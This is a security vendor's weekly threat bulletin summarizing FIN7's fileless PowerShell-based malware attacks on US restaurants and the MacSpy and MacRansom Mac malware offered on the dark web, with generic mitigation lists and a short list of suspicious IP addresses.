New Threat to Apple Offered on the Dark Web

This week, the Alert Logic team highlights Fileless Malware and the New Threat to Apple. Read the full report to learn more and get access to the week’s Top Malicious IP addresses.

Breach

Fileless Malware Targets US Restaurants

Researchers have detected an aggressive attack on restaurants across the United States that uses a relatively new technique to keep its malware undetected by virtually all antivirus products on the market. Malicious code used in so-called fileless attacks resides almost entirely in computer memory, which prevents it from leaving traces that could be spotted by traditional antivirus scanners. The main reason the malware is effective is that the file contents are piped into computer memory using PowerShell, therefore the file wasn't visible to any of the 56 most widely used AV programs.

References: FIN7 Targeting Restaurants With Fileless Malware | FIN7 Hitting Restaurants with Fileless Malware | Fileless Malware: An Undetectable Threat

 

 

 

Mitigation Strategies:

  • FIM solution would detect any type of file modification or addition.
  • Intrusion detection system (IDS) signatures would detect intrusion and network anomalies.
  • Security Operations Center team provides 24x7 security monitoring, daily log review, web application firewall management and advanced anomaly detection.
  • Mail filtration would scan incoming files and hyperlinks of any malicious links or code.
  • Web filtration to prevent users from clicking on malicious websites.

Malware

New Threat to Apple Offered on the Dark Web

Researchers discovered a new threat to Apple, two pieces of Mac malware – “MacRansom” and “MacSpy.” The malware seems to be created by the same developer and is being offered for sale through two separate dark web portals. The researchers were able to obtain a copy of the “MacSpy” program, described as the most sophisticated malware for Mac OS-x operating system to date.

The hackers offering MacSpy on the dark net are not selling it but in fact – giving it away at no cost. The software combines with a provided TOR portal to enable users to hack into and obtain surveillance information from targeted Mac computers.

References: Two Mac Malware-as-a-Service Offerings Uncovered | New Threat to Apple Being Offered on The Dark Web, it is The MACSPY RAT | MACSPY – Remote Access Trojan as a Service on Dark Web

 

Mitigation Strategies:

  • Web filtration to prevent users from clicking on malicious websites
  • Intrusion detection system (IDS) signatures would detect intrusion and network anomalies.
  • Security Operations Center team provides 24x7 security monitoring, daily log review, web application firewall management and advanced anomaly detection.
  • FIM solution would detect any type of file modification or addition.
  • Log management could detect any suspicious user account activity.
  • Mail filtration would scan incoming files and hyperlinks of any malicious links or code.

This Week's Suspicious IP Addresses

4.70.0.121 4.70.0.115
4.70.0.143 4.70.0.130
4.70.0.132 239.255.255.250

*IP addresses provided by Recorded Future.